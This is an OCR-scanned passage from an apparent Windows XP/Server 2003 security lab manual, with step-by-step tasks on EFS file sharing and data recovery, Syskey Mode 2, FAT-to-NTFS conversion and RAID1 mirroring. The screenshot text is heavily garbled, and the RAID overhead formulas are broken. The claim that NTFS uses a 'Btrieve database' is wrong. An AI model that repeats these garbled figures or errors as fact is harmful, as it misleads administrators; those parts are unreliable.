User2’s encryption key.

11. Select the Security tab of the Properties dialog box. Select the Users group in the top
pane. Notice that users of the local system have Read & Execute, Read, and Write
permissions inherited from parent folders.

12. Click OK.

13. Notice in Explorer that both files, Secrets. txt and User2Secrets.txt, are

now displayed in green (the default color and settings), indicating the EFS status
of the files.

14. Open User2Secrets.txt with Notepad and view your message to confirm that you can
access the data when logged on as User2 even though the file is now encrypted.

15. Close Notepad.
16. Log off as User2.

Sharing EFS Content to User2

Log on to the local computer as Userl with the password Password1.

Launch Explorer by right-clicking the Start button and selecting Explore.

Select the root of the C:\ drive in the left pane.

In the right pane, double-click the folder GOODSTUFF.

Open Secrets.txt with Notepad to confirm that User1 has access to the EFS content.
Close Notepad.

N o g~ w D=

In Explorer, attempt to open User2Secrets. txt. Once again Notepad launches, but
even though you just confirmed that Userl has permissions to read the User2Secrets
.txt document, you get the error message Access is denied. EFS has this document
encrypted so that only User2 can decrypt the file.

Click OK to clear the error message, and then close Notepad.
In Explorer, right-click on Secrets.txt and select Properties.
10. Click Advanced.

11. Select Details. Notice that Userl is the only user listed as Users Who Can
Transparently Access This File. Also notice that Administrator is listed as the Data
Recovery Agent for Secrets.txt. This is the due to the EFS Data Recovery Agent
policy you implemented earlier in this task.
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13.
14.

15.
16.
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Encryption Details for, C:\GOODSTUFF\Secrets. txt

Users ‘Wha Can Trangparently Access This File:

3

Usger Mame Certificate Thu..
Userl (User1 @] AEJEO7EE 31B..
Add .. Remove

[rata Recovery Agents For This File 4z Defined By Recovery Policy:

Recovery Agent Mame Certificate Thu
Admiristrator 091E AB29 7FD
0K ] [ Cancel

Click Add.
Highlight User2.

Click View Certificate. This certificate for User2 holds User2’s encryption key. With
this key, Userl1 can grant User2 access to the EFS content, Secrets.txt. Close the

certificate.
Click OK in the Select User dialog box.

Notice that now both Userl and User2 are listed as Users Who Can Transparently

Access This File.

Encryption Details for. C:\GOODSTUF F\Secrets. txt

Uszers Wha Can Tranzparently Access This File:

(%]

User Mame

User! [User @P1)
User2(User2@x=P1)

Certificate Thu
AE7E 97EG 31B

E181 B1ABETF..

Add .

Remove

Data Recovery Agents For This File Az Defined By Recavery Policy:

Recovery Agent Mame
Adrministrator

Certificate Thu...
031E AE29 FFD...

Ok ] [ Cancel

169
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17. Click OK in the Encryption Details dialog box.

18. Click OK in the Advanced Attributes dialog box.

19. Click OK in the Secrets.txt Properties dialog box.

20. Open and view Secrets.txt to confirm that you still have access to the data.
21. Close Secrets. txt.

22. Log off as Userl.

Attempting Access to EFS Content as User2

1. Log on to the local computer as User2 with the password Password1.

2. Launch Explorer by right-clicking the Start button and selecting Explore.
3. Select the root of the C:\ drive in the left pane.

You may have to enable viewing of the folders and files on the C:\ drive by
TE selecting Show The Contents Of This Folder in the right pane.
In the right pane, double-click the folder GOODSTUFF.

Attempt to open Secrets.txt. You now have access to the contents of Secrets.txt as
User2.

6. Log off as User2.

Criteria for Completion

You have completed this task when you have created secure content and then
confirmed that, even with appropriate permissions to view this content, other users
cannot decrypt the content; you configured the secured content to allow selected other
users access to this sensitive data; and then confirmed that those additional user(s) can
access the encrypted data.

Task 4.2: EFS Data Recovery

One of the fundamental responsibilities of an administrator is to protect the company’s
information. This means that it is your responsibility to be able to recover any lost or
inaccessible data. There are several reasons that an administrator may need to recover
content users encrypted via EFS. A user can accidentally delete their decryption key, or
a user may forget their password and need to have it reset. (Resetting a user’s password
disables a user’s ability to decrypt their EFS content.) The decryption key is stored inside
the user profile. If this profile gets deleted, the decryption key is lost.
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Since you have been configured as an EFS Data Recovery Agent, you can decrypt users’
encrypted content and recover the inaccessible data.

Scenario

As a security administrator, you are responsible for protecting sensitive information and
implementing EFS. After cleaning up the User Account database, you realize there is
critical data that has been encrypted by a deleted user account. You must recover the data
and provide access to that data to another user.

Scope of Task

Duration
This task should take 20 minutes.

Setup

EFS is enabled through the use of a Public Key Infrastructure (PKI) and digital certificates
that contain an encryption key. If the decryption key is lost, the user may never regain
access to the EFS content.

A safety mechanism to minimize data loss is the EFS Data Recovery Agent. Typically
the Local Administrator or a Domain Administrator should be configured as the EFS Data
Recovery Agent.

Taking advantage of the work performed in Task 4.1, you will delete a user account
that had created secured content. You will then confirm that other users cannot access
the content. With that completed, you will work through the steps to recover (decrypt) the
content and grant access to the content to another user. That user would then have access
to the secure EFS content utilizing their encryption key.

Caveat

There are combinations of events that can permanently prevent decryption of the content.
Data can be lost. Implement EFS with care. If you implement EFS for your users, provide
proper training and warnings to those users regarding these issues.

Procedure

For this task, you will delete a user (User2) that you created in Task 4.1. User2 created a
secure data file called User2Secure.txt. You will then log on as User1 and confirm that
even though permissions should allow access to the content, EFS does not allow User1 to
access the User2 secured content.

You will then walk through the steps to decrypt the content and grant ownership of the
critical data to another user. This new owner should implement EFS using their encryption key
to secure this sensitive data. This task requires the completion of Task 4.1, “The Encrypting
File System™.
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Equipment Used

For this task, you must have:

= Windows XP Pro system with the following configuration:

= A member of a workgroup (not a member of a domain)

s At least one NTFS volume

s Local Administrator access

Details

Losing an EFS Encryption Key

1. Log on to the Windows XP Pro system as the Local Administrator with the password

Passwordl1.

2. Right-click on My Computer and select Manage to open the Computer Management

console.

3. Expand Local Users And Groups. Select the Users subfolder.

LI Computer Management

=) File  Action  Yew Window Help

e aEB 2

EBX)
JRETE

Computer Management (Local)
=1 i, System Tooks
#-{g]] Event Yiewsr
Shared Folders
= E Lacal Users and Groups
4 Users

[ Groups

&

@& Removable Storage
Disk Defragmerter
Disk Management
-5 Services and Applications

|~

Mame

| Full Marne

| Description

] Aiministrator
Guest
B Helpassistant

#GsupPORT_38. ..

Remnote Desktop Help Assi...
Ch=Microsoft Corporation...

Userl
Userz

Builk-in account for sdrinistering t
Built-in account for quest access to
asccount for Providing Remote Assis
This is & vendor's account for the -

(3

4. In the right pane, right-click on User2 and select Delete.

5. Review the warning regarding the deletion of user accounts. Click Yes to confirm the

deletion of User2.

Local Users and Groups

Each user is represented by & unique identifier which is independent of the user name.
! Once a user is deleted, even creating an identically named user in the Future will not
restare access to resources which currently include the user in their access contral lists.

Are you sure you want to delete the user User2?

‘es

Mo

6. Close the Computer Management console. You have just deleted User2, the only user
account that had access to User2Secrets. txt.



Implementing EFS Data Recovery

1. Launch Explorer by right-clicking the Start button and selecting Explore.
Select the root of the C:\ drive in the left pane.

Task 4.2: EFS Data Recovery

2
3. In the right pane, double-click the folder GOODSTUFF.
4

. In Explorer, double-click User2Secrets. txt.

B C:\GOODSTUFF m=E
Fle Edt View Favoritss Tooks Help [
Qrex - ) T O seareh [ raners | [ 50 X 6) -

Address |@c:\aooD5TuFF "‘ Go
Folders X | Name Size | Type

(@ Desktap &) | B secreks.xt i 1KE  Text Document
(4 My Documents [E)ilserzSecets bt ; 1KE Test Dacumert
ERTE

S 3% Floppy (A
[ e 5YS_BOOT (C1)
= aa

153 GOODSTUFF
| Program Files
|2 RECYCLER.

I3 WINDOWS
123 wUTemp
&b O Drive (D:)
2 control Panel
? 3 1y Nehunrk Plares

1) Documents and Sektings

123 System Yolume Informat

2

the system.

Close User2Secrets. txt in Notepad.

User2Secrets.txt opens correctly in Notepad. This is because the Local
Administrator, by default, has Full Control permissions on all user files and, in Task
4.1, was configured as an EFS Data Recovery Agent for any EFS content produced on

Right-click the file User2Secrets. txt and select Properties.

Select the Security tab.

User25ecrets. txt Properties

e

General | Security |

Group or user names:

2 5-1-6:21-2771680065-1017937101-1279371868-1007
€7 svSTEM
!ﬁ Users (<P 14\Uzers]

Permizsions for Administratars Allow Deny
Full Cantral O
Modify O
Fead & Execute O
Fiead I
write: O
Special Permissions

For special pemissions of for advanced settings,
click Advanced
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Notice that Administrators, a local security group, has full control of the
TE file. The Local Administrator is a member of this group.
9. Select the General tab.

10. Click the Advanced button. Doing so opens the Advanced Attributes dialog box. In
this dialog box, click the Details button, which takes you to the Encryption Details
dialog box. To transfer access to Userl, you must add User1 to the Users Who Can
Transparently Access This File list. Click the Add button.

Encryption Details for C:VGOODSTUFF\User2Secrets. txt E]

Users ‘who Can Transparently Access This File:

User Name Certificate Thu..
User2(User2@:P1] 1523 507C 8DA..

Add

Data Recovery Agents For This File &3 Defined By Recovery Palicy:

Recovery Agent Name Certificate Thu..
Adrinistrator 1415 8B73 CDF...
[ 0K ] [ Cancel ]

11. Select User1 in the Select User dialog box and click OK.

12. To tighten up the EFS security on this sensitive file, select User2, the deleted user, in
the Users Who Can Transparently Access This File list, and then click the Remove
button.

13. Click OK in the Encryption Details dialog box.

14. Click OK in the Advanced Attributes dialog box.

15. Click OK in the User2Secrets.txt Properties dialog box.
16. Log off as Administrator.

Testing the EFS Data Recovery

1. Log on to the Windows XP Pro system as User1 with the password Password1.
2. Launch Explorer by right-clicking the Start button and selecting Explore.

3. Select the root of the C:\ drive in the left pane.
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In the right pane, double-click the folder GOODSTUFF.

In Explorer, double-click User2Secrets.txt. User2Secrets.txt opens correctly in
Notepad. This is because User1 has sufficient permissions on all GOODSTUFF files
and was added to the list of Users Who Can Transparently Access This File by the EFS
Data Recovery Agent.

Close User2Secrets. txt in Notepad.
Log off as Userl.

Criteria for Completion

You have completed this task when you have removed User2 from the local system;
successfully transferred access to the EFS content, the User2Secrets. txt file, to Userl by
implementing EFS Data Recovery; and confirmed this access as User1.

Task 4.3: Implementing Syskey

Syskey is a utility that strengthens security on the user account database on a Windows
system. It is built into the Windows operating system and encrypts the Security Accounts
Management (SAM) database.

Syskey has three modes of operation:

s Syskey Mode 1 is implemented by default on every Windows operating system since
Windows 2000. Mode 1 encrypts the SAM database and stores the decryption key
securely on the local system. This key is accessed automatically at system startup.

= Syskey Mode 2 stores the key locally, but requires that a system key password be typed
in during the system bootup process to access the SAM database decryption key just
prior to starting any services. Without the proper system key password, system services
fail to start, thus crippling the system.

s Syskey Mode 3 stores the key locally, but requires that a system key password be sup-
plied via removable media, like a floppy disk or a USB drive, during the system bootup
process to access the SAM database decryption key. Without the removable media con-
taining the system key password, system services fail to start, thus crippling the system.

Scenario

You are responsible for strengthening the security of several of your critical systems. You
must configure one of your critical systems with a startup password to be entered by a
system administrator. Unfortunately, the BIOS on this system does not provide for this
capability, so you must implement Syskey Mode 2.
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Scope of Task

Duration
This task should take 30 minutes.

Setup

You are the administrator of an XP Professional system and wish to strengthen its security.

Caveat

Syskey is a powerful tool that can and will lock you out of your own system!
Do not select to export the key unless you have one of the following:

= A USB port and a USB drive
= A functioning A: drive with a usable, formatted, blank floppy disk

Once you initiate the export process, the system changes the decryption key and then must
complete the export process of the new system key password. There is no cancel feature! If
the system changes the decryption key and does not export the new system key password to
removable media, it may not be possible to log on to the computer.

Follow the steps in this procedure carefully.

Procedure

For this task, you will log on to the XP Professional system as the Local Administrator.
You will launch Syskey and implement Mode 2.

Equipment Used

For this task, you must have:

= Windows XP Pro system with the following configuration:
= A member of a workgroup (not a member of a domain)

s Local Administrator access

Details

Implementing Syskey Mode 2
1. Log on to the Windows XP Pro system as the Local Administrator.

2. Select Start » Run and type in Syskey. Click OK. Doing so opens the Securing The
Windows XP Account Database dialog box.

3. Notice that you cannot disable encryption; the option is dimmed in the Securing The
Windows XP Account Database dialog box. Click Update.
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Securing the Windows XP Account Database El

Thiz toal will allow you to configure the Accounts
Database to enable additional encryption, fuither
pratecting the databagse from compromise.

Once enabled, thiz enciyption cannot be
disabled.

~

&+ Enciyption Enabled

ok Cancel ‘ Update |

4. By default, Windows 2000, XP, Server 2003, Windows Vista, Windows 7, Server 2008,

5.

and Server 2008 R2 are configured to store the startup key locally. Select Password
Setup and enter Password1 in both the Password and Confirm fields.

Startup Key &l

% Pazsword Startup

Requires a password to be entered during system
start.

Pagssword:

Corifirm

" System Generated Password

~

Cancel

Click OK. You will be presented with a success message. Click OK to clear the
message.

Testing Syskey Mode 2

1.
2.
3.

From the Start menu, select Shut Down.
In the Shut Down Windows dialog box, select Restart from the drop-down list.

As the system restarts, before any system services are started you will be presented
with a Windows XP Startup Password dialog box. Enter the password Password1 and
click OK.

Windows XP Startup Password

This computer is configured ta require a password
in arder to start up, Please enter the Startup
Pazsword below.

@ Pazsword ’—
Restart
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4. Startup will complete and you will be presented with the standard MS GINA
dialog box.

MS GINA is the Microsoft Graphical Identification And Authentication
TE dialog box.

5. Log on normally as the Administrator.

Resetting Syskey to Mode 1
1. Select Start » Run and type Syskey. Click OK.
2. Click Update in the Securing The Windows XP Account Database dialog box.

3. Under System Generated Password in the Startup Key dialog box, select Store Startup
Key Locally.

)’ You could also change the startup password, remaining in Syskey Mode 2,
AdTE by entering and confirming a new password here.

4. You will be prompted for the startup password. Enter Password1, and then click OK.

5.  You will receive a success message indicating that the startup key was changed. Click
OK to clear the message.

Criteria for Completion

You have completed this task when you have configured the system to operate in Syskey Mode
2 and then tested this with a reboot that requires you to enter the new startup password. You
must then reset the system into Syskey Mode 1, Syskey’s default mode of operation.

Task 4.4: Converting FAT to NTFS

The original Microsoft file system was called FAT (File Allocation Table). Windows
NT introduced a more robust and secure file system called NTFS (New Technology File
System).

FAT uses a linked list to keep track of the files on the partition, like a table of contents,
with entries generally listed in the order the files were added to the partition. FAT
supports a few attributes, such as Time Saved, Date Saved, Parent Container, Read Only,
Archive, System, Hidden, and Directory (vs. File). Historically, FAT had three possible
implementations: FAT12, FAT16, or FAT32. But in early 2008, Microsoft released exFAT
with Windows Vista SP1. The exFAT file system is most often used on USB flash drives.
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Floppy disks use FAT12, using a 12-bit cluster addressing scheme.

Partitions on hard drives in systems running DOS, Windows 3x, and 9x, and on
Windows N'T, 2000, and Server 2003 basic disks can be formatted with FAT16 using a
16-bit cluster addressing scheme.

Optionally on disks in systems running Windows NT, 2000, XP, and Server 2003 basic
disks, partitions can be formatted with FAT32, using a 32-bit cluster addressing scheme for
larger partitions.

NTEFS, the preferred file system, is available only on Windows N'T, Windows 2000,
Windows XP, Windows Server 2003, Windows Vista, Windows 7, or Windows Server
2008. NTFS uses a Btrieve database to record file locations in order to make searching for
files notably faster. It also supports extended attributes, such as Encryption, Compression,
Ownership, Permissions, and Auditing.

Scenario

You are responsible for the protection of sensitive information. You discover that two of
the partitions used to store this data on an XP Pro system are using the FAT file system.
You must strengthen the security of this file-storage location.

Scope of Task

Duration
This task should take 30 minutes.

Setup

There is a command-line utility, called Convert.exe, used to convert FAT partitions into
NTES partitions. You will use this tool to implement the conversion.

Caveat

Converting from FAT to NTFS is a one-time, one-way conversion. NTFS is supported
by Windows NT, Windows 2000, Windows XP, Windows Server 2003, Windows Vista,
Windows 7, Windows Server 2008, and Windows Server 2008 R2. DOS and Windows 9x
cannot read NTFS. If the volume you are converting from FAT to NTFS contains any of
these down-level (DOS, Windows 9x) operating systems, they will fail to boot ever again.
The conversion process from FAT to NTFS is, theoretically, nondestructive. However,
a prudent administrator would never implement such a severe procedure without performing a
confirmed, good backup of all data and valuable information assets on the system. Expect the
unexpected to occur! You should back up all valuable data on the system before proceeding.
The reverse process, converting from NTES to FAT is a destructive process. You must
first perform a backup of all content on the NTFS partition. Then you must delete the
NTES partition, destroying all data; re-create the partition; and format the new partition
with the desired FAT file system. You could then restore all content from your backup if
necessary.
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Procedure

For this task, you will initialize a new disk in the system, as necessary. You will then
create a new partition, formatted with FAT. You will use the Convert utility to convert the
partition to NTFS and confirm successful completion of the conversion.

Equipment Used

For this task, you must have:

= Windows XP Professional system with the following configuration:
= A member of a workgroup (not a member of a domain)

= One new disk (basic), installed in the system, with no partitions

s Local Administrator access

Details

Configuring the FAT Partition
1. Log on to the Windows XP Professional system as the Local Administrator.

2. Right-click on My Computer and select Manage to open the Computer Management
console.

3. Select Disk Management in the left pane.

S Computer Management f'-_ EW__(I
Q File Action  View Window  Help ===
- EIENEE
Computer Management (Local) Wolume | Layout: | Type | File System | Status ‘ Capacity | Free Spa
=, System Todls = () Partition Basic  NTF5 Healthy (System) 3.99GB 2,56 GB
+1-{fi] Event Viewer SwrPyOL_ER (D:) Partition  Basic CDFS Healthy 489MB  OMB

+ Shared Folders
¥ Local Users and &Eroups
+

&4] Performance Logs and Alerts

Disk Management 2

+ Removable Storage
Disk Defragmenter
+ B} Services and Applications

-~
&Ppisk 0 I

Basic {C:)
3.99GB 3.99 GB NTFS
online Healthy (System)

EDisk 1 I
Basic

8.00 GB &.00 GB

Online Unallocated

W Unallocated [l Primary partition

~
v

If the disk has not been initialized before, you will be presented with the
TE Initialize And Convert Disk Wizard. If so, proceed with step 4. If you are not

presented with this wizard, skip to step 8.



4. On the first screen of the Initialize And Convert Disk Wizard, click Next.
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Initialize and Convert Disk Wizard El

welcome to the Initialize and
Convert Disk Wizard

This wizard helps you to initialize new disks and to convert
emply basic disks to dynamic disks.

“ou can use dynamic disks to create software-based RAID
olumes that can be mirored. or they can be stiped or
spanned across multiple disks. Tou can also expand
single-disk and spanned volumes without having to restart
the computer.

After you convert a disk ta dynamic, pou can only use
indows 2000 and |ater versions of Windows on any
volume of that disk,

To continue, click MNext.

5. Be sure your new disk is selected to be initialized. Click Next.

Initialize and Conve

Select Disks to Initialize

Disks:

k Wizard

*ou must initislize & disk befare Logical Disk Manager can access it

Select one o more disks to initialize.

[whDisk 2

[ <Back ][ Hets> ] [ Cancel ]

6. Be sure the check box is cleared on the Select Disks To Convert screen. Click Next.

Initialize and Conve

Select Disks to Convert

Disks:

The disks you select will be converted to dynamic disks.

Select one or more disks to convert:

[iDisk 1

<Back | Me> | [ Concel
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7. Click Finish to complete the wizard.

Initialize and Convert Disk Wizard

Completing the Initialize and
Convert Disk Wizard

“You have successfully completed the Initislize and Corwert

Disk 'wizard.

‘ou selected the following seltings:

Initialize: Disk 2
Convert; Mone

To close this wizard, click Finigh,

[ <Back | Fiish | [ Cancel |

8. In Computer Management » Disk Management, right-click on the new disk in the
Unallocated area, and select New Partition.

9. Click Next on the first screen of the New Partition Wizard.

New Partition Wizard @

Welcome to the New Partition
@ Wizard

This wizard helps you create a pattition on a basic disk

& basic disk is a physical disk that containg primary parlitions,
extended partitions, and logical drives. You can use any
version of Windows or MS-D0S to gain access to partitions
on basic disks.

To continue, click Next

[ Next > ]I Cancel I

10. On the Select Partition Type screen, select Primary Partition. Click Next.
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New Partition Wizard

Select Partition Type
There are thiee types of partitions: primary, extended, and logical.

Ll

Select the partiion you want to create;
(%) Primary partition
() Extended partition

Description

A primary partition is & volume pou create using free space on a basic disk.
“windows and other operating spstems can start from a primay partition. T'ou can
create up to four primary partitions of three primary partitions and an extended
partition,

[ < Back H Mext > ][ Cancel l

11. On the Specify Partition Size screen, enter a desirable partition size. In our example,
the partition size will be approximately 1 GB. Click Next.

Mew Partition Wizard 5_<|
Specily Partition Size
Chaose a partition size that is between the maximum and minimunn sizes x
Maxium disk space in megabytes (MB): 8183
Minimum disk zpace in MB: 8

Partition size in MB: 1000 %

< Back “ Nest » ][ Cancel

If you select too small a partition size, you will be forced to implement
a FAT(16) file system on the partition. If free space is available, select
between 500 MB and 1 GB.

12. Allow the wizard to select the next drive letter (by default). In our example, the
partition will be labeled as drive letter E:. Click Next.
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New Partition Wizard @
Assign Drive Letter or Path
For easier access, you can assign a drive letter or drive path to wour partition,

() assign the following diive letter: E ~
() Mount i the following emply NTFS folder:

) Do not assign a drive letter o dive path

< Back ]I Mext > I[ Cancel ]

13. On the Format Partition screen, select FAT32 (if available; choose FAT if FAT32 is not
available) from the File System drop-down list. Enter DATA in the Volume Label field.
Select the option Perform A Quick Format.

New Partition Wizard
Format Partition
To store data on this partition, you must format it first,

Chaose whether you want ta farmat this partition, and if $o, what settings you want to use.

() Do ot farmat this partition
() Format this partition with the fallowing settings:
File system: ‘ FaT32 v

Allocation unit size: Default b
Volume label DATA |

Perform a quick format

Enable file and folder compressior

< Back " Mext > ]I Cancel

14. Click Next.
15. Click Finish to complete the New Partition Wizard.



16. In Computer Management » Disk Management, observe your new FAT partition
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New Partition Wizard El

Completing the New Partition

e
You have successiully completed the Mew Partition ‘wizard,

You selected the following settings:
Partition type: Primary partition ~
Disk selected: Disk 1
Partition size: 1000 MB
Drive letter or path: E:

File system: FAT32

Allocation unit size: Default
Yolume label: DATA
Muick Format es

To cloge this wizard, click Finish.

[ < Back “ Firish ][ Cancel ]

named DATA.
Ll Computer Management - @@‘
Q File Action View ‘Window Help == J
& = =)
l Computer Management {Local) Volume: | Layouk | Type | File: System | Status | Capacity | Ft
= msvstem Tools =y Partition  Basic  MTFS Healthy (System) 3.99GE 2,
+ Event\hewer =IDaTA ED) Partition  Basic  FAT32 Healthy 994 ME 9
+-g] Shared Folders EhwEPYOL_EN(D0) Partition  Basic  CDFS Healttry 489ME 0O
+ Local Users and Groups
+- 8% Performance Logs and Alerts

=) Device Manager

= @ Storage

+ Remaovable Storage
Disk. Defragmenter

Disk Management & X d
+ Services and Applications A
& &PDisk 0

Basic {C)

3.9? =1} 3.99 GB NTFS

Online Healthy {System)

EPDisk 1 !

Basic DATA (E:)

S.UFI (=1} 996 ME FAT32 7.02 GB

Onling Healthy Unallocated -
¢ 5 | | [l Unaliocated [l Primary partition

17. Minimize the Computer Management console.

Creating Data on the New FAT Partition

1.

2
3.
4

Launch Explorer by right-clicking the Start button and selecting Explore.
In the left pane, select your new DATA partition.

Right-click the white space in the right pane and select New » Text Document.

Enter a filename with the .txt extension.
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5. [Edit the text document and add some copy that you will recognize later.
6. Save the new document with your new copy.

7. Close Explorer.

Converting the New FAT Partition
1. Still logged on as the Administrator, select Start » Run and enter CMD. Then click OK.

2. At the command prompt, enter the command CONVERT /2.

o+ BoBo ROCKS!!!

Microsoft Windows XP [Uersion 5.1.2680]
{C> Copyright 1985-2881 Microsoft Corp.

C:=x\>convert -7
Converts PFAT volumes to MIFS.

ICONUERT volume ~FS:NTFS L[-U] [-CutfArea:filenamel [-NoSecurityl [sH1

volume Specifies the drive letter {(followed by a colonl,
mount point. or volume name.
P8 zNTFS Specifies that the volume iz to be converted to NIFS.

4 Specifies that Convert should be »un in verhose mode.
/CutfArea:filename
Specifies a contiguous file in the root directory to he
the place holder for NIFS system files.
/NoSecurity Specifies the converted files and directories security
settings to be accessible by evervone.
Fe Forces the volume to dismount first if necessary.
A1l opened handles to the volume would then he invalid.

Review the switches associated with the Convert utility.

At the command prompt, enter the command CONVERT X: /FS:NTFS, where X: is the drive
letter for your new DATA partition. In our example, the DATA partition has E: as the
drive letter.

5. Where prompted, enter the name of the FAT partition, DATA, and then press Enter.

Microsoft Windows XP [Version 5.1.26801
{C» Copyright 1985-2881 Microsoft Corp.

C:\>convert ~7
Converts FAT volumes to NIFS.

ICONUERT volume ~FS:NIFS L[-U]1 [/CutAreazfilenamel] [~NoSecurityl L[/¥]

volume Specifies the drive letter <(followed by a colon).
mount point, or volume name.

#FS :NIFS Specifies that the volume is to be converted to NIFS.

U Specifies that Convert chould be pun in verhbhose mode._

#CutArea:filename
Specifies a contiguous file in the wroot directory to he
the place holder for NIFS system files.

~HoSecurity Specifies the converted files and directories security
settings to be accessible by everyone.

Pt Forces the volume to dismount first if necessary.
A1l opened handles to the volume would then be invalid.

C:“>CONUERT E: -FS:NIFS
The type of the file system is FAT32.
Enter current volume label for drive E: DATA
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6. The Convert utility completes with a summary of its progress.

7.

< BoBo ROCKS!!!

#FS:NTFS Specifies

U Specifies
sCutArea:filename

Specifies

the place

#NoSecurity Specifies

C:~>CONUERI E: ~FS:NTFS

that the volume is to be converted to NIFS.
that Conuvert should be »un in verhose mode.

a contiguous file in the root directory to he
holder for NIFS system files.
the converted files and directories security

settings to he accessible hy evervone.
% Forces the volume to dismount first if necessary.
A1l opened handles to the volume would then he invalid.

The type of the file system is FAT32.
nter current volume label for drive E: DATA

Eolume DATA created B8-/30-2086 11:17 PM
olume Serial Number is BAFF-2881

indows is verifying files and folders...
File and folder verification is complete.

indows has checked the file system and found no problems.

1,042, 522,112 hytes total disk space.
896 bytes in 1 files.
1.842,513.928 hytes available on disk.
4,896 hytes in each allocation unit.
254,522 total allocation units on disk.
254,528 allocation units available on disk.

etermining disk space required for file system conversion...

otal disk space:
ree space on volume:

1828896 KB
16180868 KB

pace required for conversion: 8396 KB
onverting file system
onversion complete

Y3

Close the command window.

Confirming the New NTFS Partition

1.

Open the Computer Management console. Notice the DATA partition now shows

as NTFS.

Close the Computer Management console.

Launch Explorer by right-clicking the Start button and selecting Explore.
In the left pane, select your new DATA partition. Notice the new System Volume

Information folder. This is a component of an NTFS partition.

File Edit Wew Favorites Tools  Help

Qe - @ - F POseat ‘[.B Folders

& X 9 @

(L) My Documents [Z] Mewr Text Document bxt
ERTE
I3 3% Floppy (A1)
“ee Local Disk (C:)
(LY WRPWOL_EN (D)

|25 System Volume Informati
@ Contral Panel
|3 Shared Documents
(0 Administratar's Documents
|3 intense's Documents
W My Network Places
2/ Recycle Bin

Address [a Exy v B
Folders X | Mame Size | Type
(& Desktop System Wolume Information File Folder

1KB  Text Document
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Double-click on your New Text Document.txt file.
Confirm the file is readable.

You have successfully converted from a FAT partition to an NTES partition and could
implement folder and file permissions as well as encryption on all of the content on
this new volume. This NTFS partition now supports the use of extended attributes,
providing valuable features like permissions, auditing, ownership, compression, and
encryption.

Criteria for Completion

You have completed this task when you have successfully converted your new FAT partition
to an N'TFS partition and have confirmed no data loss.

Task 4.5: Implementing Disk Fault
Tolerance with RAID

A significant aspect of information systems security relates to protecting against the loss of
data and ensuring the data’s availability. Data is written on hard disks. These disks can and
will fail, resulting in data loss and loss of availability of the data. Fault-tolerant disk arrays
are a common approach to mitigating the losses related to disk failure.

Redundant Array of Independent Disks (RAID) systems can be implemented to provide
fault tolerance of disks. The two most common implementations of RAID are RAID1
(Mirroring) and RAIDS (Stripe Set With Parity).

RAID1 requires two disks and provides no performance boost or degradation. It
provides for one disk to be lost, yet all of the data stored on the mirrored volume remains
intact and available. The overhead in disk space for this fault tolerance follows the formula 1,
where 7 represents the number of disks in the array. In the case of the mirrored volume,
two disks are used so the overhead is 3, or 50 percent.

RAIDS requires three disks minimum and can be extended to 32 disks as a typical
maximum. It provides increasing performance boost as the number of disks in the array are
utilized. It provides for one disk to be lost, yet all of the data stored on the RAIDS volume
remains intact and available. The overhead in disk space for this fault tolerance also follows
the formula !, where 7 represents the number of disks in the array. In the case of a 3-disk
RAIDS volume, 3 disks are used so the overhead is §, or 33 percent. In the case of a
10-disk RAIDS volume, 10 disks are used so the overhead is-, or 10 percent. And in the

case of a 32-disk RAIDS5 Volume, 32 disks are used so the ovlgrhead is 45, or 3 percent.
Read and write times in a RAIDS volume follow a similar efficiency. The formula for

read and write time performance is t = 1/(n — 1) where n represents the number of disks in

the array. As you increase the number of disks in the volume, the performance gets better

and better.
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Scenario

You are responsible for ensuring the availability of a critical data set on a file server. While
the budget is tight, you must implement a fault-tolerant disk array to protect against loss of
data and to improve data availability.

Scope of Task

Duration
This task should take 45 minutes.

Setup

Because of budget concerns, you must provide fault tolerance while keeping spending to
a minimum. You have chosen to implement Microsoft’s software-based RAID1 to satisfy
these issues. You have just added two new disks to your file server.

Caveat

The installation of new hardware and the configuration of partitions or volumes can be
risky. Always perform a full backup of the system prior to implementation of any new
hardware, software, or changes to the system’s configuration.

Procedure

For this task, you will configure the system with a RAID1 volume to hold your critical
data set.

Equipment Used

For this task, you must have:

= Windows Server 2003 system with the following configuration:
= Two new disks (basic)

s Local Administrator access

Details
New Disk Initialization and Conversion to Dynamic Disk

1. Log on to the Windows Server 2003 system as the Local Administrator with the
password Password1.

Fault-tolerant disk arrays are available only on server-class operating
TE systems from Microsoft. You cannot build RAID1 or RAID5 arrays in

Windows 2000 Pro, Windows XP, Windows Vista, or Windows 7.
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2. Right-click on My Computer and select Manage to open the Computer Management
console.

=lolx|

Q File  Action ‘iew ‘Window Help |;|i|l|
ERCIEEE

Mame
mSystem Toals
Shorage
@Services and Applications

Event. Viewer

Shared Folders

Lacal Users and Groups

b Performance Logs and Alerts
evice Manager

E—]& Storage
& Removable Storage
v Disk Defragmenter
r% Disk Management
E]--& Services and Applications

3. In the left pane, select Disk Management. The Initialize And Convert Disk Wizard will
launch. Click Next.

4. On the Select Disks To Initialize screen, confirm that the two new disks are selected for
initialization. Click Next.

Select Disks to Ini
You must intialize a disk before Logical Disk Manager can access it

Select one or more disks to intialize.
Diskes:

Disk 1
Digk 2

< Back I Hext > I Cancel
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5. On the Select Disks To Convert screen, confirm that the two new disks are selected for
conversion to dynamic disks. This is required to assemble a fault-tolerant disk array.
Click Next.

6. Confirm that the two new disks are selected for initialization and conversion to
dynamic disks. Click Finish.

Completing the Initialize and
Convert Disk Wizard

“rou have successfully completed the Initialize and Convert
Disk Wwizard

“T'ou gelected the following settings:
Initialize; Disk 1, Disk 2
Convert: Disk 1, Disk 2

To close this wizard, click Finish

< Back I Finish I Cancel

Creating the RAID1 Mirrored Volume

1. In the Disk Management console, confirm your two new disks are present and are
dynamic. Right-click on the Unallocated space on the first new disk and select New
Volume.

e e raeit =8|

? D @

2

LN SYS _BOOT (C:)
¥ Gib D

. | | I Unallocated [l Prmary pasthon
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2. Doing so launches the New Volume Wizard. Click Next.
3. On the Select Volume Type screen, click Mirrored. Then click Next.

Select Yolume Type
There are five types of volumes: simple, spanned, stiped, mirored, and RAID-5.

Select the volume you want to create:

1 Simple & Hinored
" Spanned € BAIDE
1~ Stiiped
Description

A mirrored volume duplicates your data on bwo dynamic disks. Create a mirored
wolume if pou want to keep two separate copies of all your information to prevent
data loss.

< Back I Mext > I Cancel

4. On the Select Disks screen, select the second new disk on the left side, and then click
the Add button. The second disk should appear on the Selected list on the right side, as
shown. Click Next.

Select Disks
“ou can select the disks and set the disk size for this valume. z

Select the dynamic disks pou want to use, and then click Add.

Awailable: Selected:
[ ] petmeens
< Hemnve
< Hemove Al
Tatal volume size in megabytes (MB]: 2EI47

Maximum available space in MB: 2047
Select the amount of space in ME |2U=17 _I:;‘

